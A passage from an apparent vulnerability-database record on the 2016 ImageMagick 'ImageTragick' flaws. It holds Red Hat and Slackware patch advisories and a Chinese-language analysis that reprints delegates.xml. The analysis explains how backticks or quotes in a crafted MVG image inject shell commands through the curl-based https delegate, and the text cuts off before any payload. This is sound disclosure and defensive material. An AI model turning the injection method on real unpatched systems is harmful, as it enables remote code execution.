user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. 
Please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files before doing so.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-09T16:56:15", "type": "redhat", "title": "(RHSA-2016:0726) Important: ImageMagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2018-06-06T16:24:27", "id": "RHSA-2016:0726", "href": "https://access.redhat.com/errata/RHSA-2016:0726", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2022-03-12T09:33:49", "description": "New imagemagick packages are available for Slackware 14.0, 14.1, and -current\nto fix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/imagemagick-6.8.6_10-i486-2_slack14.1.txz: Rebuilt.\n This update addresses several security issues in ImageMagick, including:\n Insufficient shell characters filtering allows code execution (CVE-2016-3714)\n Server Side Request Forgery 
(CVE-2016-3718)\n File deletion (CVE-2016-3715)\n File moving (CVE-2016-3716)\n Local file read (CVE-2016-3717)\n To mitigate these issues, the default policy.xml config file has been\n modified to disable all of the vulnerable coders.\n For more information, see:\n https://imagetragick.com\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3714\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3718\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3715\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3716\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3717\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/imagemagick-6.7.7_10-i486-2_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/imagemagick-6.7.7_10-x86_64-2_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/imagemagick-6.8.6_10-i486-2_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/imagemagick-6.8.6_10-x86_64-2_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/imagemagick-6.9.4_1-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/imagemagick-6.9.4_1-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\ne78d8825fc122e9411b9bbde341ce8da imagemagick-6.7.7_10-i486-2_slack14.0.txz\n\nSlackware x86_64 14.0 
package:\n20bbb69e3a774f9493b3c87a90692b8f imagemagick-6.7.7_10-x86_64-2_slack14.0.txz\n\nSlackware 14.1 package:\n26aa6ce379628b85df0818b17d5b855d imagemagick-6.8.6_10-i486-2_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n3060644c634984224e448ecd03bd0eb1 imagemagick-6.8.6_10-x86_64-2_slack14.1.txz\n\nSlackware -current package:\n7add4b4c162a9e59ae309ea38430e44e xap/imagemagick-6.9.4_1-i586-1.txz\n\nSlackware x86_64 -current package:\n73a376cb32a9fbf529340982dfdb9b88 xap/imagemagick-6.9.4_1-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg imagemagick-6.8.6_10-i486-2_slack14.1.txz", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-11T06:33:30", "type": "slackware", "title": "[slackware-security] imagemagick", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-11T06:33:30", "id": "SSA-2016-132-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.440568", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-14T20:45:04", "description": "New imagemagick packages are available for Slackware 14.0, 14.1, and -current\nto fix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/imagemagick-6.8.6_10-i486-2_slack14.1.txz: Rebuilt.\n This update addresses several security issues in ImageMagick, including:\n Insufficient shell characters filtering allows code execution (CVE-2016-3714)\n Server Side Request Forgery (CVE-2016-3718)\n File deletion (CVE-2016-3715)\n File moving (CVE-2016-3716)\n Local file read (CVE-2016-3717)\n To mitigate these issues, the default policy.xml config file has been\n modified to disable all of the vulnerable coders.\n For more information, see:\n https://imagetragick.com\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3714\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3718\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3715\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3716\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3717\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/imagemagick-6.7.7_10-i486-2_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/imagemagick-6.7.7_10-x86_64-2_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/imagemagick-6.8.6_10-i486-2_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/imagemagick-6.8.6_10-x86_64-2_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/imagemagick-6.9.4_1-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/imagemagick-6.9.4_1-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\ne78d8825fc122e9411b9bbde341ce8da imagemagick-6.7.7_10-i486-2_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n20bbb69e3a774f9493b3c87a90692b8f imagemagick-6.7.7_10-x86_64-2_slack14.0.txz\n\nSlackware 14.1 package:\n26aa6ce379628b85df0818b17d5b855d imagemagick-6.8.6_10-i486-2_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n3060644c634984224e448ecd03bd0eb1 imagemagick-6.8.6_10-x86_64-2_slack14.1.txz\n\nSlackware -current package:\n7add4b4c162a9e59ae309ea38430e44e xap/imagemagick-6.9.4_1-i586-1.txz\n\nSlackware x86_64 -current package:\n73a376cb32a9fbf529340982dfdb9b88 xap/imagemagick-6.9.4_1-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg imagemagick-6.8.6_10-i486-2_slack14.1.txz", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-11T06:33:30", "type": "slackware", "title": "[slackware-security] imagemagick", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-11T06:33:30", "id": "SSA-2016-132-01-IMAGEMAGICK", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.440568", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:12:00", "description": "\u8be6\u60c5\u6765\u6e90\uff1a[CVE-2016-3714 - ImageMagick \u547d\u4ee4\u6267\u884c\u5206\u6790 - 
\u4e4c\u4e91\u77e5\u8bc6\u5e93](http://drops.wooyun.org/papers/15589)\r\n\r\nImageMagick\u662f\u4e00\u6b3e\u4f7f\u7528\u91cf\u5f88\u5e7f\u7684\u56fe\u7247\u5904\u7406\u7a0b\u5e8f\uff0c\u5f88\u591a\u5382\u5546\u90fd\u8c03\u7528\u4e86\u8fd9\u4e2a\u7a0b\u5e8f\u8fdb\u884c\u56fe\u7247\u5904\u7406\uff0c\u5305\u62ec\u56fe\u7247\u7684\u4f38\u7f29\u3001\u5207\u5272\u3001\u6c34\u5370\u3001\u683c\u5f0f\u8f6c\u6362\u7b49\u7b49\u3002\u4f46\u8fd1\u6765\u6709\u7814\u7a76\u8005\u53d1\u73b0\uff0c\u5f53\u7528\u6237\u4f20\u5165\u4e00\u4e2a\u5305\u542b\u300e\u7578\u5f62\u5185\u5bb9\u300f\u7684\u56fe\u7247\u7684\u65f6\u5019\uff0c\u5c31\u6709\u53ef\u80fd\u89e6\u53d1\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u3002\r\n\r\n\u56fd\u5916\u7684\u5b89\u5168\u4eba\u5458\u4e3a\u6b64\u65b0\u5efa\u4e86\u4e00\u4e2a\u7f51\u7ad9\uff1a https://imagetragick.com/ \uff0c\u4e0d\u5f97\u4e0d\u8bf4\uff0c\u6709\u4e9b\u5916\u56fd\u4eba\u86ee\u4f1a\u73a9\u7684\u3002\r\n\r\n\u76f8\u5bf9\u4e8e\u4e4b\u524d\u7684\u6570\u4e2a\u62e5\u6709\u300e\u4e3b\u9875\u300f\u7684\u6f0f\u6d1e\uff0c\u8fd9\u4e2a\u6d1e\u786e\u5b9e\u4e0d\u4e00\u822c\uff0c\u786e\u5b9e\u662f\u4e00\u4e2a\u53ef\u4ee5\u88ab\u5229\u7528\u7684\u597d\u6d1e\uff0c\u4e4c\u4e91\u4e3b\u7ad9\u4e0a\u4e5f\u7206\u51fa\u4e86\u6570\u4e2a\u88ab\u8be5\u6f0f\u6d1e\u5f71\u54cd\u7684\u5927\u5382\u5546\u3002\u6211\u4eec\u5148\u6765\u5206\u6790\u4e00\u4e0b\u5b83\u51fa\u73b0\u7684\u539f\u56e0\u3002\r\n\r\n### 0x01 
\u539f\u7406\u5206\u6790\r\n\u4e0e\u8fd9\u4e2a\u6f0f\u6d1e\u76f8\u5173\u7684CVE\u6709CVE-2016-3714\u3001CVE-2016-3715\u3001CVE-2016-3716\u3001CVE-2016-3717\uff0c\u5176\u4e2d\u6700\u4e25\u91cd\u7684\u5c31\u662fCVE-2016-3714\uff0c\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u53ef\u4ee5\u9020\u6210\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u7684\u5371\u5bb3\u3002\r\n\r\nImageMagick\u6709\u4e00\u4e2a\u529f\u80fd\u53eb\u505adelegate\uff08\u59d4\u6258\uff09\uff0c\u4f5c\u7528\u662f\u8c03\u7528\u5916\u90e8\u7684lib\u6765\u5904\u7406\u6587\u4ef6\u3002\u800c\u8c03\u7528\u5916\u90e8lib\u7684\u8fc7\u7a0b\u662f\u4f7f\u7528\u7cfb\u7edf\u7684system\u547d\u4ee4\u6765\u6267\u884c\u7684\uff08 https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44cec16c08d78241f7aa3754485004/MagickCore/delegate.c#L347 \uff09\r\n\r\n\u6211\u4eec\u5728ImageMagick\u7684\u9ed8\u8ba4\u914d\u7f6e\u6587\u4ef6\u91cc\u53ef\u4ee5\u770b\u5230\u6240\u6709\u7684\u59d4\u6258\uff1a /etc/ImageMagick/delegates.xml\r\n\r\n```\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<!DOCTYPE delegatemap [\r\n<!ELEMENT delegatemap (delegate)+>\r\n<!ELEMENT delegate (#PCDATA)>\r\n<!ATTLIST delegate decode CDATA #IMPLIED>\r\n<!ATTLIST delegate encode CDATA #IMPLIED>\r\n<!ATTLIST delegate mode CDATA #IMPLIED>\r\n<!ATTLIST delegate spawn CDATA #IMPLIED>\r\n<!ATTLIST delegate stealth CDATA #IMPLIED>\r\n<!ATTLIST delegate thread-support CDATA #IMPLIED>\r\n<!ATTLIST delegate command CDATA #REQUIRED>\r\n]>\r\n<!--\r\n Delegate command file.\r\n \r\n Commands which specify\r\n \r\n decode=\"in_format\" encode=\"out_format\"\r\n \r\n specify the rules for converting from in_format to out_format These\r\n rules may be used to translate directly between formats.\r\n \r\n Commands which specify only\r\n \r\n decode=\"in_format\"\r\n \r\n specify the rules for converting from in_format to some format that\r\n ImageMagick will automatically recognize. 
These rules are used to\r\n decode formats.\r\n \r\n Commands which specify only\r\n \r\n encode=\"out_format\"\r\n \r\n specify the rules for an \"encoder\" which may accept any input format.\r\n \r\n For delegates other than ps:*, pcl:*, and mpeg:* the substitution rules are\r\n as follows:\r\n \r\n %i input image filename\r\n %o output image filename\r\n %u unique temporary filename\r\n %Z unique temporary filename\r\n %# input image signature\r\n %b image file size\r\n %c input image comment\r\n %g image geometry\r\n %h image rows (height)\r\n %k input image number colors\r\n %l image label\r\n %m input image format\r\n %p page number\r\n %q input image depth\r\n %s scene number\r\n %w image columns (width)\r\n %x input image x resolution\r\n %y input image y resolution\r\n \r\n Set option delegate:bimodal=true to process bimodal delegates otherwise they\r\n are ignored.\r\n \r\n If stealth=\"True\" the delegate is not listed in user requested\r\n \"-list delegate\" listings. These are typically special internal delegates.\r\n \r\n If spawn=\"True\" ImageMagick will not way for the delegate to finish,\r\n nor will it read any output image. 
It will only wait for either the input\r\n file to be removed (See \"ephemeral:\" coder) indicating that the input file\r\n has been read, or a maximum time limit of 2 seconds.\r\n-->\r\n<delegatemap>\r\n <delegate decode=\"autotrace\" stealth=\"True\" command=\""convert" "%i" "pnm:%u"\\n"autotrace" -input-format pnm -output-format svg -output-file "%o" "%u"\"/>\r\n <delegate decode=\"blender\" command=\""blender" -b "%i" -F PNG -o "%o""\\n"convert" -concatenate "%o*.png" "%o"\"/>\r\n <delegate decode=\"browse\" stealth=\"True\" spawn=\"True\" command=\""xdg-open" http://www.imagemagick.org/; rm "%i"\"/>\r\n <delegate decode=\"cdr\" command=\""uniconvertor" "%i" "%o.svg"; mv "%o.svg" "%o"\"/>\r\n <delegate decode=\"cgm\" thread-support=\"False\" command=\""ralcgm" -d ps -oC < "%i" > "%o" 2> "%Z"\"/>\r\n <delegate decode=\"dvi\" command=\""dvips" -q -o "%o" "%i"\"/>\r\n <delegate decode=\"dng:decode\" command=\""ufraw-batch" --silent --create-id=also --out-type=png --out-depth=16 "--output=%u.png" "%i"\"/>\r\n <delegate decode=\"dot\" command='"dot" -Tsvg "%i" -o "%o"' />\r\n <delegate decode=\"edit\" stealth=\"True\" command=\""/etc/alternatives/x-terminal-emulator" -title "Edit Image Comment" -e vi "%o"\"/>\r\n <delegate decode=\"eps\" encode=\"pdf\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 "-sDEVICE=pdfwrite" "-sOutputFile=%o" "-f%i"\"/>\r\n <delegate decode=\"eps\" encode=\"ps\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=nodevice" "-sOutputFile=%o" "-f%i"\"/>\r\n <delegate decode=\"fig\" command=\""fig2dev" -L ps "%i" "%o"\"/>\r\n <delegate decode=\"plt\" command=\""echo" "set size 1.25,0.62; set terminal postscript portrait color solid; set output \\'%o\\'; load \\'%i\\'" > "%u";"gnuplot" "%u"\"/>\r\n <delegate decode=\"hpg\" command=\""hp2xx" -q -m eps -f `basename "%o"` "%i"; mv -f `basename "%o"` "%o"\"/>\r\n 
<delegate decode=\"hpgl\" command=\"if [ -e hp2xx -o -e /usr/bin/hp2xx ]; then hp2xx -q -m eps -f `basename "%o"` "%i"; mv -f `basename "%o"` "%o"; else echo "You need to install hp2xx to use HPGL files with ImageMagick."; exit 1; fi\"/>\r\n <delegate decode=\"htm\" command=\""html2ps" -U -o "%o" "%i"\"/>\r\n <delegate decode=\"html\" command=\""html2ps" -U -o "%o" "%i"\"/>\r\n <delegate decode=\"https\" command=\""curl" -s -k -o "%o" "https:%M"\"/>\r\n <delegate decode=\"ilbm\" command=\""ilbmtoppm" "%i" > "%o"\"/>\r\n <delegate decode=\"man\" command=\""groff" -man -Tps "%i" > "%o"\"/>\r\n <delegate decode=\"mpeg:decode\" command=\""ffmpeg" -v -1 -i "%i" -vframes %S -vcodec pam -an -f rawvideo -y "%u.pam" 2> "%Z"\"/>\r\n <delegate encode=\"mpeg:encode\" stealth=\"True\" command=\""ffmpeg" -v -1 -mbd rd -trellis 2 -cmp 2 -subcmp 2 -g 300 -i "%M%%d.jpg" "%u.%m" 2> "%Z"\"/>\r\n <delegate decode=\"sid\" command=\""mrsidgeodecode" -if sid -i "%i" -of tif -o "%o" > "%u"\"/>\r\n <delegate decode=\"pcl:color\" stealth=\"True\" command=\""pcl6" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=ppmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "%s"\"/>\r\n <delegate decode=\"pcl:cmyk\" stealth=\"True\" command=\""pcl6" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pamcmyk32" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "%s"\"/>\r\n <delegate decode=\"pcl:mono\" stealth=\"True\" command=\""pcl6" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pbmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "%s"\"/>\r\n <delegate decode=\"pdf\" encode=\"eps\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=epswrite" "-sOutputFile=%o" 
"-f%i"\"/>\r\n <delegate decode=\"pdf\" encode=\"ps\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=nodevice" "-sOutputFile=%o" "-f%i"\"/>\r\n <delegate decode=\"tiff\" encode=\"launch\" mode=\"encode\" command=\""gimp" "%i"\"/>\r\n <delegate decode=\"pnm\" encode=\"ilbm\" mode=\"encode\" command=\""ppmtoilbm" -24if "%i" > "%o"\"/>\r\n <delegate decode=\"pov\" command=\""povray" "+i%i" -D0 "+o%o" +fn%q +w%w +h%h +a -q9 "-kfi%s" "-kff%n";"convert" -concatenate "%o*.png" "%o"\"/>\r\n <delegate decode=\"ps\" encode=\"eps\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=epswrite" "-sOutputFile=%o" "-f%i"\"/>\r\n <delegate decode=\"ps\" encode=\"pdf\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pdfwrite" "-sOutputFile=%o" "-f%i"\"/>\r\n <delegate decode=\"ps\" encode=\"print\" mode=\"encode\" command=\"lpr "%i"\"/>\r\n <delegate decode=\"ps:alpha\" stealth=\"True\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "-f%s" "-f%s"\"/>\r\n <delegate decode=\"ps:cmyk\" stealth=\"True\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pam" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "-f%s" "-f%s"\"/>\r\n <delegate decode=\"ps:color\" stealth=\"True\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pnmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "-f%s" "-f%s"\"/>\r\n <delegate decode=\"ps:mono\" stealth=\"True\" command=\""gs" -q -dQUIET 
-dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pbmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "-f%s" "-f%s"\"/>\r\n <delegate decode=\"rgba\" encode=\"rle\" mode=\"encode\" command=\""rawtorle" -o "%o" -v "%i"\"/>\r\n <delegate decode=\"scan\" command=\""scanimage" -d "%i" > "%o"\"/>\r\n <delegate decode=\"scanx\" command=\""scanimage" > "%o"\"/>\r\n <delegate decode=\"miff\" encode=\"show\" spawn=\"True\" command=\""/usr/bin/display" -delay 0 -window-group %[group] -title "%l " "ephemeral:%i"\"/>\r\n <delegate decode=\"shtml\" command=\""html2ps" -U -o "%o" "%i"\"/>\r\n <delegate decode=\"svg\" command=\""rsvg-convert" -o "%o" "%i"\"/>\r\n <delegate decode=\"txt\" encode=\"ps\" mode=\"bi\" command=\""enscript" -o "%o" "%i"\"/>\r\n <delegate decode=\"miff\" encode=\"win\" stealth=\"True\" spawn=\"True\" command=\""/usr/bin/display" -immutable -delay 0 -window-group %[group] -title "%l " "ephemeral:%i"\"/>\r\n <delegate decode=\"wmf\" command=\""wmf2eps" -o "%o" "%i"\"/>\r\n <delegate decode=\"xps:color\" stealth=\"True\" command=\""gxps" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=ppmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "%s"\"/>\r\n <delegate decode=\"xps:cmyk\" stealth=\"True\" command=\""gxps" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=bmpsep8" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "%s"\"/>\r\n <delegate decode=\"xps:mono\" stealth=\"True\" command=\""gxps" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pbmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" 
"%s"\"/>\r\n</delegatemap>\r\n```\r\n\r\n\u6211\u4eec\u53ef\u4ee5\u770b\u5230\uff0c\u8fd9\u91cc\u5b83\u5b9a\u4e49\u4e86\u5f88\u591a\u5360\u4f4d\u7b26\uff0c\u6bd4\u5982%i\u662f\u8f93\u5165\u7684\u6587\u4ef6\u540d\uff0c%l\u662f\u56fe\u7247exif label\u4fe1\u606f\u3002\u800c\u5728\u540e\u9762command\u7684\u4f4d\u7f6e\uff0c%i\u548c%l\u7b49\u5360\u4f4d\u7b26\u88ab\u62fc\u63a5\u5728\u547d\u4ee4\u884c\u4e2d\u3002\u8fd9\u4e2a\u6f0f\u6d1e\u4e5f\u56e0\u6b64\u800c\u6765\uff0c\u88ab\u62fc\u63a5\u5b8c\u6bd5\u7684\u547d\u4ee4\u884c\u4f20\u5165\u4e86\u7cfb\u7edf\u7684system\u51fd\u6570\uff0c\u800c\u6211\u4eec\u53ea\u9700\u4f7f\u7528\u53cd\u5f15\u53f7\uff08`\uff09\u6216\u95ed\u5408\u53cc\u5f15\u53f7\uff0c\u6765\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\r\n\r\n\u6f0f\u6d1e\u62a5\u544a\u4e2d\u7ed9\u51fa\u7684POC\u662f\u5229\u7528\u4e86\u5982\u4e0b\u7684\u8fd9\u4e2a\u59d4\u6258\uff1a\r\n\r\n```\r\n<delegate decode=\"https\" command=\""curl" -s -k -o "%o" "https:%M"\"/>\r\n```\r\n\r\n\u5b83\u5728\u89e3\u6790https\u56fe\u7247\u7684\u65f6\u5019\uff0c\u4f7f\u7528\u4e86curl\u547d\u4ee4\u5c06\u5176\u4e0b\u8f7d\uff0c\u6211\u4eec\u770b\u5230%M\u88ab\u76f4\u63a5\u653e\u5728curl\u7684\u6700\u540e\u4e00\u4e2a\u53c2\u6570\u5185\u3002ImageMagick\u9ed8\u8ba4\u652f\u6301\u4e00\u79cd\u56fe\u7247\u683c\u5f0f\uff0c\u53ebmvg\uff0c\u800cmvg\u4e0esvg\u683c\u5f0f\u7c7b\u4f3c\uff0c\u5176\u4e2d\u662f\u4ee5\u6587\u672c\u5f62\u5f0f\u5199\u5165\u77e2\u91cf\u56fe\u7684\u5185\u5bb9\uff0c\u800c\u8fd9\u5176\u4e2d\u5c31\u53ef\u4ee5\u5305\u542bhttps\u5904\u7406\u8fc7\u7a0b\u3002\r\n\r\n\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u6784\u9020\u4e00\u4e2a.mvg\u683c\u5f0f\u7684\u56fe\u7247\uff08\u4f46\u6587\u4ef6\u540d\u53ef\u4ee5\u4e0d\u4e3a.mvg\uff0c\u6bd4\u5982\u4e0b\u56fe\u4e2d\u5305\u542bpayload\u7684